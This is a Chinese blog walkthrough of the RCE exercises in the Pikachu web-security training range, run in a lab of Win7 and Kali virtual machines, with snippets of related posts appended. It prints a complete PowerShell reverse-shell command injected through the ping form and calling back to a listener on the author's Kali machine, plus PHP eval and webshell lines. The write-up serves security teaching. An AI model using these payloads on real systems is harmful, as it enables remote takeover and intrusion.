九、pikachu靶场--rce

已于 2025-06-21 19:30:45 修改
阅读量372 收藏 10
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 网络安全项目实训 文章标签: 安全 web安全
于 2025-06-18 21:06:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74035741/article/details/148747656

一、rce简介

        iKachu 靶场中的 RCE(Remote Command/Code Execute,远程命令 / 代码执行)漏洞是一种严重的安全漏洞,它允许攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统

二、rce漏洞原理

        应用程序未对用户输入进行严格过滤,直接将输入内容拼接至系统命令、代码执行函数或反序列化过程中,导致攻击者可以注入恶意命令或代码

三、环境准备

(1)win7虚拟机

(2)在win7虚拟机上搭建的pikachu靶场

(3)在win7虚拟机上安装的purbsuite

(4)先前搭建的kali虚拟机

四、实操--exec“ping”

        该漏洞模拟了场景:许多 Web 应用需要与操作系统交互,例如执行 ping 命令检查网络连通性。如果应用直接将用户输入(如 IP 地址)拼接到系统命令中而不进行过滤,攻击者可以注入额外的命令

(1)打开kali终端,输入以下命令:

//详细监听4444端口
nc -lvnp 4444

(2)在pikachu-->rce-->exec“ping”中输入以下命令:

127.0.0.1; cmd.exe /c echo off & setlocal & cd & powershell -NoProfile -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.226.134',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $encoding = New-Object System.Text.ASCIIEncoding; $data = $encoding.GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = $encoding.GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush()}; $client.Close()"

//其中,192.168.226.134是kali虚拟机的IP地址

点击ping,kali虚拟机若成功截获,则会出现一下提示:

此时,便可以通过kail虚拟机远程操纵win7虚拟机了,分别输入whoami(查看用户名)、ipconfig(查看网络配置)来验证:

在进行远程操作,输入命令catc、notepad,打开win7虚拟机的计算机和记事本:

四、实操--exec“eval”

        eval()是是PHP 中用于执行字符串形式 PHP 代码的函数。若应用将用户可控的输入直接作为eval()的参数,攻击者可注入恶意 PHP代码,从而在服务器上执行任意命令

(1)输入 phpinfo();  ,成功界面如下所示:

(2)输入 system(“whoami”);  ,成功界面如下所示:

(3)输入system(“cact”); 会成功打开win7虚拟机的计算机:

(4)输入system(“ipconfig”); 成功界面如下所示:

pikachu练习----RCE
ptxybird的博客
11-09 4487
一、RCE概念学习 RCE英文全称:remote command/code execute,分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。 Pi
Pikachu靶场-RCE
qq_53083285的博客
11-18 346
pikachu靶场-RCERCE漏洞概述RCE演示远程命令执行远程代码执行 RCE漏洞概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次
Pikachu靶场-RCE漏洞
最新发布
sucker的博客
04-22 1150
防御需结合输入过滤、最小权限、代码审计等多层机制,同时及时更新依赖库和框架补丁。即使代码执行失败,攻击者仍可能通过盲注(Blind RCE)探测漏洞。:利用Struts2、Spring、Fastjson等框架的漏洞(如CVE-2017-5638)。:应用程序未对用户输入进行严格过滤,直接将输入内容拼接至系统命令、代码执行函数或反序列化过程中。:污染开源库(如PyPI、npm包)间接引入RCE。:反序列化未经验证的数据触发恶意代码(如Java的。:通过未授权接口执行系统命令(如路由器固件漏洞)。
Pikachu-RCE
baynk的博客
11-19 1442
0x00 RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入...
pikachu-RCE
ZhuoLLLLLL的博客
12-28 1115
因为这个命令不但windows和linux系统都支持(windows xp不默认支持,可安装),而且显示的内容不同,不但可以用来判断是否有远程命令执行漏洞,还可以用来判断操作系统(linux系统中显示当前执行操作的用户名,windows系统中显示当前登录的域名和用户名)如果设计者在此输入界面的功能上没有做严格的安全控制,攻击者就可以通过此接口注入恶意的命令,让后台执行,从而控制整个后台服务器。成功连接就能进入对方电脑的后台了,可以看到对方的所有文件,攻击成功!命令执行一般发生在远程,故被称为远程命令执行。
pikachuRCE
qq_43665434的博客
02-12 1098
pikachuRCE 一、神魔是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“
pikachu 靶场 RCE
lee_maple的博客
11-19 3089
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的
远程命令、代码执行RCE漏洞
weixin_43858799的博客
05-13 4402
一、RCE介绍: RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界...
pikachu靶场-RCE
braty_的博客
02-24 538
RCE(remote command/code execute)概述RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
RCE(远程命令执行)————pikachu靶场
qq_61579604的博客
10-16 472
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
【网络安全-rce漏洞-pikachu
weixin_65311462的博客
09-12 2082
由于应用程序在处理用户输入时未能正确验证、过滤或限制输入数据,导致hacker能通过网络在目标系统上执行任意代码或命令,从而完全控制受影响的系统。RCE漏洞是一种严重的安全漏洞类型,对系统安全构成重大威胁。
Pikachu系列——RCE
Zlirving_的博客
05-17 725
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验三 —— CSRF RCE概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 RCE分为两种 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测
pikachu靶场RCE
Yb_140的博客
11-14 3111
RCE概述(来自pikachuRCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 一.输出ip并查看当前目录 输入127.0.0.1,发现 再输入127.0.0.1&&dir 二.执行 直接执行phpinfo(); ...
Pikachu(皮卡丘)靶场---RCE(remote command/code execute)
m0_74850066的博客
06-15 587
看看靶场的概述RCE(remote command/code execute)概述RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
Pikachu靶场--RCE
qq_65150735的博客
06-17 721
Pikachu靶场--RCE远程命令/代码执行
Pikachu靶场——远程命令执行漏洞(RCE)
来日可期的博客
10-05 3220
远程命令执行(Remote Code Execution,RCE)是一种安全漏洞,攻击者可以通过该漏洞在远程服务器上执行恶意代码或命令。RCE 漏洞通常出现在应用程序或操作系统中,由于不正确的输入验证或处理而导致。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果设计者在
PiKachu靶场RCE(远程系统命令执行)
angry_program的博客
02-21 9156
概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交...
pikachu靶场rce
03-29
### 关于Pikachu靶场中的RCE漏洞 Pikachu是一款专为Web安全学习设计的靶场系统,其中包含了多种常见的Web安全漏洞。对于初学者而言,它提供了一个理想的环境来实践和理解各种攻击向量[^1]。 #### RCE漏洞概述 远程代码执行(Remote Code Execution, RCE)是一种严重的安全漏洞,允许攻击者通过目标系统的应用程序运行任意代码。在Pikachu靶场中,存在多个场景模拟这种类型的漏洞。例如,在`exec "ping"`的功能实现上,如果未对用户输入进行严格过滤,则可能导致恶意命令注入并被执行[^2]。 #### 利用方法示例 以下是几种典型的RCE漏洞利用方式: 1. **创建反向Shell** 攻击者可以通过上传自定义PHP脚本的方式获取更高权限的操作界面。例如,下面这段代码可用于生成一个简单的后门程序: ```php <?php eval($_POST["cmd"]); ?> ``` 将上述内容写入服务器上的某个可访问位置(如`shell.php`),即可通过发送特定请求控制该服务端进程[^4]。 2. **文件操作指令嵌套** 另一种常见手法是在合法功能之外附加额外的动作。比如以下命令会尝试将一段恶意代码保存至临时文本文件中: ```bash echo "<?php @eval(\$_POST['cmd']); ?>" > mm.txt ``` 此外还可以进一步扩展成更复杂的逻辑链路以便长期维持连接通道[^5]。 #### 中文显示问题处理建议 当遇到因字符集不匹配引起的乱码现象时,可以在受影响页面顶部增加指定编码声明语句解决这个问题。具体做法如下所示: ```php header("Content-type:text/html;charset=gb2312"); ``` 不过需要注意的是,这样做可能会影响到其他部分正常展示效果;因此必要时候可以选择有条件启用或者完全移除这条设置行[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值